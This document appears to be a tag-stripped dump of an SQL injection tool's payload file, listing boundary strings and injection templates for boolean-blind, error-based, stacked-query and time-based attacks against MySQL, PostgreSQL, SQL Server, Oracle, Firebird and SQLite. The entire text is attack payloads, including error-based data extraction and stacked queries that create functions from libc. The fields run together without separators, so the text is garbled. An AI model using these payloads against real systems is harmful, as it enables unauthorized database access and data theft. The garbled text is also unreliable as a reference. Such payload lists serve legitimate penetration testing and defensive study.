101,2,31111,21)AND ([RANDNUM]=[RANDNUM]211,21))AND (([RANDNUM]=[RANDNUM]311,21)))AND ((([RANDNUM]=[RANDNUM]111,22'AND '[RANDSTR]'='[RANDSTR]111,22')AND ('[RANDSTR]'='[RANDSTR]211,22'))AND (('[RANDSTR]'='[RANDSTR]311,22')))AND ((('[RANDSTR]'='[RANDSTR]211,23'AND '[RANDSTR]' LIKE '[RANDSTR]211,23')AND ('[RANDSTR]' LIKE '[RANDSTR]311,23'))AND (('[RANDSTR]' LIKE '[RANDSTR]311,23')))AND ((('[RANDSTR]' LIKE '[RANDSTR]211,24"AND "[RANDSTR]"="[RANDSTR]311,24")AND ("[RANDSTR]"="[RANDSTR]411,24"))AND (("[RANDSTR]"="[RANDSTR]411,24")))AND ((("[RANDSTR]"="[RANDSTR]311,25"AND "[RANDSTR]" LIKE "[RANDSTR]411,25")AND ("[RANDSTR]" LIKE "[RANDSTR]511,25"))AND (("[RANDSTR]" LIKE "[RANDSTR]511,25")))AND ((("[RANDSTR]" LIKE "[RANDSTR]AND boolean-based blind - WHERE clause11111AND [INFERENCE]AND [RANDNUM]=[RANDNUM]AND [RANDNUM]=[RANDNUM1]AND boolean-based blind - WHERE clause (MySQL comment)14111AND [INFERENCE]AND [RANDNUM]=[RANDNUM]#AND [RANDNUM]=[RANDNUM1]AND boolean-based blind - WHERE clause (Generic comment)14111AND [INFERENCE]AND [RANDNUM]=[RANDNUM]--AND [RANDNUM]=[RANDNUM1]OR boolean-based blind - WHERE clause12312OR NOT [INFERENCE]OR NOT [RANDNUM]=[RANDNUM]OR NOT [RANDNUM]=[RANDNUM1]OR boolean-based blind - WHERE clause (MySQL comment)13312OR NOT [INFERENCE]OR NOT [RANDNUM]=[RANDNUM]#OR NOT [RANDNUM]=[RANDNUM1]MySQLOR boolean-based blind - WHERE clause (Generic comment)13312OR NOT [INFERENCE]OR NOT [RANDNUM]=[RANDNUM]--OR NOT [RANDNUM]=[RANDNUM1]Generic boolean-based blind - Parameter replace1211,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))MySQL >= 5.0 boolean-based blind - Parameter replace1311,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))MySQL>= 5.0MySQL < 5.0 boolean-based blind - Parameter replace1411,2,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQLMicrosoft SQL Server/Sybase boolean-based blind - Parameter replace1311,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerOracle boolean-based blind - Parameter replace1311,33(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)OracleGeneric boolean-based blind - GROUP BY and ORDER BY clauses1312,31, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1312,31, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))MySQL>= 5.0MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses1412,31, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))MySQLMicrosoft SQL Server/Sybase boolean-based blind - ORDER BY clause13131, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))Microsoft SQL ServerOracle boolean-based blind - ORDER BY clause13131, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL), (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)OracleMySQL >= 5.0 error-based - WHERE clause (AND)21011AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0PostgreSQL error-based - WHERE clause (AND)21011AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase error-based - WHERE clause (AND)21011AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerOracle error-based - WHERE clause (AND)21011AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleFirebird error-based - WHERE clause (AND)22011AND [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]')AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL >= 5.0 error-based - WHERE clause (OR)22212OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0PostgreSQL error-based - WHERE clause (OR)22212OR [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase error-based - WHERE clause (OR)22212OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerOracle error-based - WHERE clause (OR)22212OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleFirebird error-based - WHERE clause (OR)23212OR [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]')OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL >= 5.0 error-based - Parameter replace2301,2,33(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0PostgreSQL error-based - Parameter replace2301,2,33(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase error-based - Parameter replace2301,33(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerOracle error-based - Parameter replace2301,33(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleFirebird error-based - Parameter replace2401,33(SELECT [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]'))(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]FirebirdMySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses2302,31, (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]MySQL>= 5.0PostgreSQL error-based - GROUP BY and ORDER BY clauses2302,31, (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)), (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]PostgreSQLMicrosoft SQL Server/Sybase error-based - ORDER BY clause23031, (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))), (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]Microsoft SQL ServerOracle error-based - ORDER BY clause23031, (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL), (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]OracleMySQL > 5.0.11 stacked queries41001; SELECT SLEEP([SLEEPTIME]);--MySQL> 5.0.11MySQL < 5.0.12 stacked queries42001; SELECT BENCHMARK(5000000, MD5('[SLEEPTIME]'));--MySQLPostgreSQL > 8.1 stacked queries41001; SELECT PG_SLEEP([SLEEPTIME]);--PostgreSQL> 8.1PostgreSQL < 8.2 stacked queries - exists function43001; SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 3000000));--PostgreSQL< 8.2PostgreSQL < 8.2 stacked queries - Glibc44001; CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);--PostgreSQL< 8.2LinuxMicrosoft SQL Server/Sybase stacked queries41001; WAITFOR DELAY '0:0:[SLEEPTIME]';--Microsoft SQL ServerOracle stacked queries - BEGIN DBMS_LOCK.SLEEP technique43001; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;--OracleOracle stacked queries - EXEC DBMS_LOCK.SLEEP technique44001; EXEC DBMS_LOCK.SLEEP([SLEEPTIME].00);--OracleOracle stacked queries - BEGIN USER_LOCK.SLEEP technique45001; EXEC USER_LOCK.SLEEP([SLEEPTIME].00);--OracleSQLite > 2.0 stacked queries43001; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))));--SQLite> 2.0Firebird stacked queries43001; SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6;--Firebird> 2.0MySQL > 5.0.11 AND time-based blind5111,2,31AND IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))AND SLEEP([SLEEPTIME])MySQL> 5.0.11MySQL < 5.0.12 AND time-based blind5211,2,31AND IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))MySQLSQLite > 2.0 AND time-based blind53111AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))SQLite> 2.0Firebird AND time-based blind54111AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0Firebird> 2.0MySQL > 5.0.11 OR time-based blind5231,2,32OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))OR SLEEP([SLEEPTIME])MySQL> 5.0.11MySQL < 5.0.12 OR time-based blind5331,2,32OR IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))MySQLSQLite > 2.0 OR time-based blind54311OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))SQLite> 2.0Firebird OR time-based blind55312OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0Firebird> 2.0